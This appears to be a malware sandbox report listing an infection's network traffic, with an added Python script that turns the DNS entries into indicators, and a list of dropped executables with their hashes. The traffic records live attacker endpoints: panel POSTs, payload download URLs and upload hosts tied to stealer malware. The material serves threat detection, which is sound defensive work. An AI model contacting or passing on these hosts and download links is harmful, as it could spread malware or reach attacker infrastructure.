                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/nss3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.17/2fb6c2cc8dce150a.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 103.130.147.211:80
                                                                                                                                                http://103.130.147.211/Files/2.exe
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                125.2kB
                                                                                                                                                6.9MB
                                                                                                                                                2672
                                                                                                                                                4931

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://103.130.147.211/Files/2.exe

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.202.233.158:80
                                                                                                                                                http://91.202.233.158/e96ea2db21fa9a1b.php
                                                                                                                                                http
                                                                                                                                                svchost015.exe
                                                                                                                                                727 B
                                                                                                                                                625 B
                                                                                                                                                5
                                                                                                                                                5

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://91.202.233.158/

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://91.202.233.158/e96ea2db21fa9a1b.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.67:15206
                                                                                                                                                bundle.exe
                                                                                                                                                901.4kB
                                                                                                                                                22.1kB
                                                                                                                                                680
                                                                                                                                                315
                                                                                                                                              • 95.216.143.20:12695
                                                                                                                                                penis.exe
                                                                                                                                                463.7kB
                                                                                                                                                29.6kB
                                                                                                                                                373
                                                                                                                                                168
                                                                                                                                              • 188.225.44.114:80
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                http
                                                                                                                                                2.exe
                                                                                                                                                1.0kB
                                                                                                                                                381 B
                                                                                                                                                6
                                                                                                                                                4

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://fivevd5vs.top/v1/upload.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 188.225.44.114:80
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                http
                                                                                                                                                2.exe
                                                                                                                                                75.9kB
                                                                                                                                                1.7kB
                                                                                                                                                59
                                                                                                                                                37

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://fivevd5vs.top/v1/upload.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 194.58.114.223:80
                                                                                                                                                http://194.58.114.223/d/385121
                                                                                                                                                http
                                                                                                                                                axplong.exe
                                                                                                                                                370 B
                                                                                                                                                1.8kB
                                                                                                                                                7
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                GET http://194.58.114.223/d/385121

                                                                                                                                                HTTP Response

                                                                                                                                                302
                                                                                                                                              • 162.159.129.233:443
                                                                                                                                                https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&
                                                                                                                                                tls, http
                                                                                                                                                axplong.exe
                                                                                                                                                324.5kB
                                                                                                                                                8.8MB
                                                                                                                                                5034
                                                                                                                                                6323

                                                                                                                                                HTTP Request

                                                                                                                                                GET https://cdn.discordapp.com/attachments/1274634716451967060/1285074049633878027/setup.exe?ex=66e8f1f8&is=66e7a078&hm=bf6f732aa37195abbc07bd02c5720e5642c2ebb828ca528169c8989a9af4f31b&

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 188.225.44.114:80
                                                                                                                                                http://fivevd5vs.top/v1/upload.php
                                                                                                                                                http
                                                                                                                                                2.exe
                                                                                                                                                33.8kB
                                                                                                                                                897 B
                                                                                                                                                29
                                                                                                                                                16

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://fivevd5vs.top/v1/upload.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 81.19.139.138:443
                                                                                                                                                conditionprovice.pro
                                                                                                                                                tls
                                                                                                                                                acentric.exe
                                                                                                                                                392 B
                                                                                                                                                219 B
                                                                                                                                                5
                                                                                                                                                5
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                120 B
                                                                                                                                                3
                                                                                                                                                3
                                                                                                                                              • 185.215.113.19:80
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php?scr=1
                                                                                                                                                http
                                                                                                                                                Waters.pif
                                                                                                                                                320.9kB
                                                                                                                                                37.1kB
                                                                                                                                                5387
                                                                                                                                                767

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php?scr=1

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 185.215.113.19:80
                                                                                                                                                http://185.215.113.19/CoreOPT/index.php
                                                                                                                                                http
                                                                                                                                                Waters.pif
                                                                                                                                                1.3kB
                                                                                                                                                667 B
                                                                                                                                                14
                                                                                                                                                6

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200

                                                                                                                                                HTTP Request

                                                                                                                                                POST http://185.215.113.19/CoreOPT/index.php

                                                                                                                                                HTTP Response

                                                                                                                                                200
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 91.194.55.146:29862
                                                                                                                                                RegAsm.exe
                                                                                                                                                152 B
                                                                                                                                                40 B
                                                                                                                                                3
                                                                                                                                                1
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                tls
                                                                                                                                                MjytQiW.exe
                                                                                                                                                399 B
                                                                                                                                                219 B
                                                                                                                                                5
                                                                                                                                                5
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                tls
                                                                                                                                                MjytQiW.exe
                                                                                                                                                532 B
                                                                                                                                                219 B
                                                                                                                                                6
                                                                                                                                                5
                                                                                                                                              • 54.210.117.250:443
                                                                                                                                                service-domain.xyz
                                                                                                                                                tls
                                                                                                                                                MjytQiW.exe
                                                                                                                                                288 B
                                                                                                                                                219 B
                                                                                                                                                5
                                                                                                                                                5
• 54.210.117.250:443  service-domain.xyz  MjytQiW.exe  sent 190 B / 4 pkts, received 92 B / 2 pkts
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts, received 40 B / 1 pkt
• 142.250.179.227:80  http://c.pki.goog/r/r1.crl  http  MjytQiW.exe  sent 348 B / 5 pkts, received 1.7kB / 4 pkts
  GET http://c.pki.goog/r/r1.crl -> 200
• 142.250.179.227:80  http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX  http  MjytQiW.exe  sent 1.3kB / 12 pkts, received 4.6kB / 8 pkts
  GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGs31zQSL0RFCna%2BsoPon%2Bg%3D -> 200
  GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D -> 200
  GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD1kD0PUGhH%2FBI3nnbRqNoX -> 200
• 216.58.204.78:443  https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR  tls, http  MjytQiW.exe  sent 1.1kB / 10 pkts, received 8.6kB / 12 pkts
  GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&IRrHVOlBCR -> 302
• 142.250.200.1:443  https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx  tls, http  MjytQiW.exe  sent 1.6kB / 20 pkts, received 37.8kB / 31 pkts
  GET https://clients2.googleusercontent.com/crx/blobs/AY4GWKBkU_q2Dg39Oep9jDI6KfDQyIyYN4-5JFLpNGzYLoWmrtamvIBVl_TiEj5TGIOfUv-_8N-AV1x2Gk3d70Ji36XBVHUa0Em_hUiFeE5dOo2j2SWZAMZSmuUXVsEn2ZDXwrh001O5FXTQoQ1QDQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx -> 200
• 44.236.110.137:80  http://api4.check-data.xyz/api2/google_api_ifi  http  rundll32.exe  sent 1.2kB / 4 pkts, received 536 B / 3 pkts
  POST http://api4.check-data.xyz/api2/google_api_ifi -> 200
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts
• 185.215.113.26:80  http://185.215.113.26/Dem7kTu/index.php  http  Hkbsse.exe  sent 734 B / 6 pkts, received 667 B / 6 pkts
  POST http://185.215.113.26/Dem7kTu/index.php -> 200
  POST http://185.215.113.26/Dem7kTu/index.php -> 200
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts
• 185.215.113.16:80  http://185.215.113.16/Jo89Ku7d/index.php  http  axplong.exe  sent 736 B / 6 pkts, received 627 B / 5 pkts
  POST http://185.215.113.16/Jo89Ku7d/index.php -> 200
  POST http://185.215.113.16/Jo89Ku7d/index.php -> 200
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts, received 40 B / 1 pkt
• 185.215.113.19:80  http://185.215.113.19/CoreOPT/index.php?scr=1  http  Waters.pif  sent 385.6kB / 6728 pkts, received 69.2kB / 1378 pkts
  POST http://185.215.113.19/CoreOPT/index.php -> 200
  POST http://185.215.113.19/CoreOPT/index.php -> 200
  POST http://185.215.113.19/CoreOPT/index.php?scr=1 -> 200
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts, received 40 B / 1 pkt
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts, received 80 B / 2 pkts
• 91.194.55.146:29862  RegAsm.exe  sent 152 B / 3 pkts, received 120 B / 3 pkts
• 91.194.55.146:29862  RegAsm.exe  sent 52 B / 1 pkt
• 8.8.8.8:53  fivevd5vs.top  dns  2.exe  sent 59 B / 1 pkt, received 75 B / 1 pkt
  DNS request fivevd5vs.top -> 188.225.44.114
• 8.8.8.8:53  cdn.discordapp.com  dns  axplong.exe  sent 64 B / 1 pkt, received 144 B / 1 pkt
  DNS request cdn.discordapp.com -> 162.159.129.233, 162.159.130.233, 162.159.133.233, 162.159.135.233, 162.159.134.233
• 8.8.8.8:53  HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib  dns  Waters.pif  sent 89 B / 1 pkt, received 164 B / 1 pkt
  DNS request HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
• 8.8.8.8:53  conditionprovice.pro  dns  acentric.exe  sent 66 B / 1 pkt, received 82 B / 1 pkt
  DNS request conditionprovice.pro -> 81.19.139.138
                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                service-domain.xyz
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                64 B
                                                                                                                                                80 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                service-domain.xyz

                                                                                                                                                DNS Response

                                                                                                                                                54.210.117.250

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                c.pki.goog
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                56 B
                                                                                                                                                107 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                c.pki.goog

                                                                                                                                                DNS Response

                                                                                                                                                142.250.179.227

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                o.pki.goog
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                56 B
                                                                                                                                                107 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                o.pki.goog

                                                                                                                                                DNS Response

                                                                                                                                                142.250.179.227

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                clients2.google.com
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                65 B
                                                                                                                                                105 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                clients2.google.com

                                                                                                                                                DNS Response

                                                                                                                                                216.58.204.78

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                clients2.googleusercontent.com
                                                                                                                                                dns
                                                                                                                                                MjytQiW.exe
                                                                                                                                                76 B
                                                                                                                                                121 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                clients2.googleusercontent.com

                                                                                                                                                DNS Response

                                                                                                                                                142.250.200.1

                                                                                                                                              • 8.8.8.8:53
                                                                                                                                                api4.check-data.xyz
                                                                                                                                                dns
                                                                                                                                                rundll32.exe
                                                                                                                                                65 B
                                                                                                                                                159 B
                                                                                                                                                1
                                                                                                                                                1

                                                                                                                                                DNS Request

                                                                                                                                                api4.check-data.xyz

                                                                                                                                                DNS Response

                                                                                                                                                44.236.110.137
                                                                                                                                                35.160.60.134

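The network entries above are what an analyst turns into IOCs and detection leads. The following script is an added example, not part of the Triage report or its tooling: it parses the report's flattened DNS layout (destination, domain, proto, process, two byte counts, two counters, then the request/response lines) into records, then flags the query from Waters.pif for a 21-character random-looking name that received no answer, the lookup issued by rundll32.exe, and de-prioritises the Google PKI and Chrome endpoints. The constructed sample inside the block copies four entries from this page; the benign-suffix list, the LOLBIN list and the entropy threshold are analyst assumptions, and the report's byte counts and counters are carried through unparsed rather than interpreted.

```python
"""Parse a Triage-style flattened DNS table into records, then emit IOCs and
simple triage flags.  Added example; not part of the report or of Triage."""
import math
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: four entries copied from this report's network section,
# in the order the report prints them.
SAMPLE = """
• 8.8.8.8:53
HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib
dns
Waters.pif
89 B
164 B
1
1

DNS Request

HAYtAoQHDCIZfrnmkrkib.HAYtAoQHDCIZfrnmkrkib

• 8.8.8.8:53
conditionprovice.pro
dns
acentric.exe
66 B
82 B
1
1

DNS Request

conditionprovice.pro

DNS Response

81.19.139.138

• 8.8.8.8:53
c.pki.goog
dns
MjytQiW.exe
56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.179.227

• 8.8.8.8:53
api4.check-data.xyz
dns
rundll32.exe
65 B
159 B
1
1

DNS Request

api4.check-data.xyz

DNS Response

44.236.110.137
35.160.60.134
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Analyst assumptions, not something the report states:
BENIGN_SUFFIXES = ("pki.goog", "google.com", "googleusercontent.com")
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}


@dataclass
class DnsEntry:
    resolver: str
    domain: str
    process: str
    counters: list = field(default_factory=list)  # report's two byte counts + two counters, verbatim
    answers: list = field(default_factory=list)   # IPs listed under "DNS Response"


def parse_entries(text):
    """Split on the report's bullets; fields follow the printed column order."""
    entries = []
    for chunk in text.split("• ")[1:]:
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        resolver, domain, proto, process = lines[:4]
        if proto != "dns":
            continue
        answers = []
        if "DNS Response" in lines:
            tail = lines[lines.index("DNS Response") + 1:]
            answers = [ln for ln in tail if IPV4.match(ln)]
        entries.append(DnsEntry(resolver, domain, process, lines[4:8], answers))
    return entries


def shannon_entropy(s):
    """Bits per character; random labels score high, dictionary words low."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def flags_for(e):
    if e.domain.lower().endswith(BENIGN_SUFFIXES):
        return ["benign-infra"]
    flags = []
    label = e.domain.lower().split(".")[0]      # DNS is case-insensitive
    if len(label) >= 16 and shannon_entropy(label) >= 3.5:   # threshold is an assumption
        flags.append("random-looking")
    if not e.answers:                            # no "DNS Response" recorded
        flags.append("unresolved")
    if e.process.lower() in LOLBINS:
        flags.append("lolbin")
    return flags


def triage(entries):
    return {e.domain: flags_for(e) for e in entries}


def extract_iocs(entries):
    """Domains and answer IPs, minus infrastructure treated as benign."""
    domains, ips = set(), set()
    for e in entries:
        if "benign-infra" in flags_for(e):
            continue
        domains.add(e.domain)
        ips.update(e.answers)
    return {"domains": sorted(domains), "ips": sorted(ips)}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for domain, flags in triage(parsed).items():
        print(f"{domain:45} {flags}")
    print(extract_iocs(parsed))
```

The entropy check is a coarse filter: it would also pass a long legitimate CDN hostname, so treat "random-looking" as a lead to pivot on (passive DNS, the process that asked), not as a verdict. The "lolbin" flag only says that a Windows host binary made the lookup; on its own that is expected for some update mechanisms, but here the domain is a freshly seen .xyz name, which is why it is worth keeping in the IOC set.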
MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
  Filesize: 2.1MB
  MD5: e7b7584155841546526f216d7ba6b11b
  SHA1: 0a219012114a89469d22550996df4171cc803273
  SHA256: f412bc7d4cdd70c8416d2a578eab2bd1ac0174bfee0d83ebe5a5fd6611057aa8
  SHA512: 6cf84ed712d9a961b5f8d8ccb24ff98ea1b330a8051edea63423fe30fc3a763ec2366c8713c1290c94c54eb680cdf61e8fe9c25d8c5cb4d1606c8664fc2ca7c2

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: e99b116681e16b943265fce8331600f6
  SHA1: 6b670111f45c6d8a3e7bc121c189476c69d2ac6b
  SHA256: cd67ae8387fd39ae28f082ad7187a389ae92b94d497f5467ae32cb919b980f6b
  SHA512: 694f4d826abeb987d44a583582f487c2810d58a20387649e66819c4318d65ccef6f1270eb8b3716f5aeba3d08ffa0d592ca9c73502b480785251b7550c6270d5

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: 47688680ef2b6fd0d559811894aff2e8
  SHA1: 68355eb5891675432674b5c0a31525e38325713f
  SHA256: ca1f3ff9e3b756b7a717a764d003b8d60ffca58f38fade797d066f85a6f94cbf
  SHA512: 19ba8e11536a76e449e6cfadacb249c6f9df80aa8ff88af47d9b115b2db79f5f0e59dcc8aebfebb26697ab59a09733a56a97d40f4f9e1fd48dc6240e19e9e480

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
  Filesize: 187B
  MD5: 2a1e12a4811892d95962998e184399d8
  SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
  Filesize: 136B
  MD5: 238d2612f510ea51d0d3eaa09e7136b1
  SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
  Filesize: 150B
  MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1: 6a51537cef82143d3d768759b21598542d683904
  SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize: 10KB
  MD5: 4a251d8746963cae418acc7899c61d8e
  SHA1: 5f9ee22ddb5819569f8d3937712f302988b69c3b
  SHA256: ea5d0341985c66c16adf2fc4340193ac70df69c83c528113bf5e90cb32b1b040
  SHA512: 377985d4110c91f1995acfcd23f0873f7a39cd894d0abdc1d9be13a1b0083da4582edef663663795f57d466ed3a60a5804fa4f39cfc624ae7d172ca577180b88

• C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr
  Filesize: 872KB
  MD5: 18ce19b57f43ce0a5af149c96aecc685
  SHA1: 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
  SHA256: d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
  SHA512: a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

• C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
  Filesize: 312KB
  MD5: 389881b424cf4d7ec66de13f01c7232a
  SHA1: d3bc5a793c1b8910e1ecc762b69b3866e4c5ba78
  SHA256: 9d1211b3869ca43840b7da1677b257ad37521aab47719c6fcfe343121760b746
  SHA512: 2b9517d5d9d972e8754a08863a29e3d3e3cfde58e20d433c85546c2298aad50ac8b069cafd5abb3c86e24263d662c6e1ea23c0745a2668dfd215ddbdfbd1ab96

• C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
  Filesize: 1.1MB
  MD5: ec23d4868753f523df127f531451dcbd
  SHA1: 8a172e091d057a8db1e3e1999d48060967b99f36
  SHA256: 5a4308d45dc245870376ece2209450e5ca46872e632c81c3c61178f139ef223d
  SHA512: 2e7b63f43a49514d9c98f4ef1964d4ad2b2eef5d88500098246a31d6391f68715bd2a216a662836815615fe4cc2410fe32eacfdd0d7b3cf16f58c816a0c651fb

• C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
  Filesize: 416KB
  MD5: f5d7b79ee6b6da6b50e536030bcc3b59
  SHA1: 751b555a8eede96d55395290f60adc43b28ba5e2
  SHA256: 2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459
  SHA512: 532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

• C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
  Filesize: 187KB
  MD5: 7a02aa17200aeac25a375f290a4b4c95
  SHA1: 7cc94ca64268a9a9451fb6b682be42374afc22fd
  SHA256: 836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e
  SHA512: f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

• C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe
  Filesize: 6.4MB
  MD5: 4475bfcbfea874adedc1a2818afe4c87
  SHA1: 607ec3e9578f6ea4ee0059911d8170ca84d5f78d
  SHA256: 638dd1f701aec57c51765e330c7c4664d8913cb3d0e54bb1c102bdbe30452ecc
  SHA512: 1e8cd4b64693defe44b811e92fce83f6a6b52e4d9c7ec6e9eb9aa70d6a2ef357882b646d93d0e3b3bbb7543731a260e7c69a5aa4c061d36b7540f6dbd3f745d1

• C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
  Filesize: 4.1MB
  MD5: 7fa5c660d124162c405984d14042506f
  SHA1: 69f0dff06ff1911b97a2a0aa4ca9046b722c6b2f
  SHA256: fd3edfaff77dd969e3e0d086495e4c742d00e111df9f935ed61dfba8392584b2
  SHA512: d50848adbfe75f509414acc97096dad191ae4cef54752bdddcb227ffc0f59bfd2770561e7b3c2a14f4a1423215f05847206ad5c242c7fd5b0655edf513b22f6c

• C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
  Filesize: 494KB
  MD5: 6760374f17416485fa941b354d3dd800
  SHA1: d88389ec19ac3e87bc743ba3f8b7c518601fdbf9
  SHA256: 9dc31fbd03da881700908423eb50c6b0c42c87fec28e817449d3dd931802c9f5
  SHA512: 6e4d2f17cb93fe831198c2eaa35bf030d6a06d620645d3e1452c6bd6e77e42baa9dc323fd60a2c5ae1d89124adde69972c489739d4bd73ba01b95b829a777eab

• C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
  Filesize: 304KB
  MD5: 30daa686c1f31cc4833bd3d7283d8cdc
  SHA1: 70f74571fafe1b359cfe9ce739c3752e35d16cf5
  SHA256: 504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822
  SHA512: 9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9

• C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
  Filesize: 454KB
  MD5: 37d198ad751d31a71acc9cb28ed0c64e
  SHA1: 8eb519b7a6df66d84c566605da9a0946717a921d
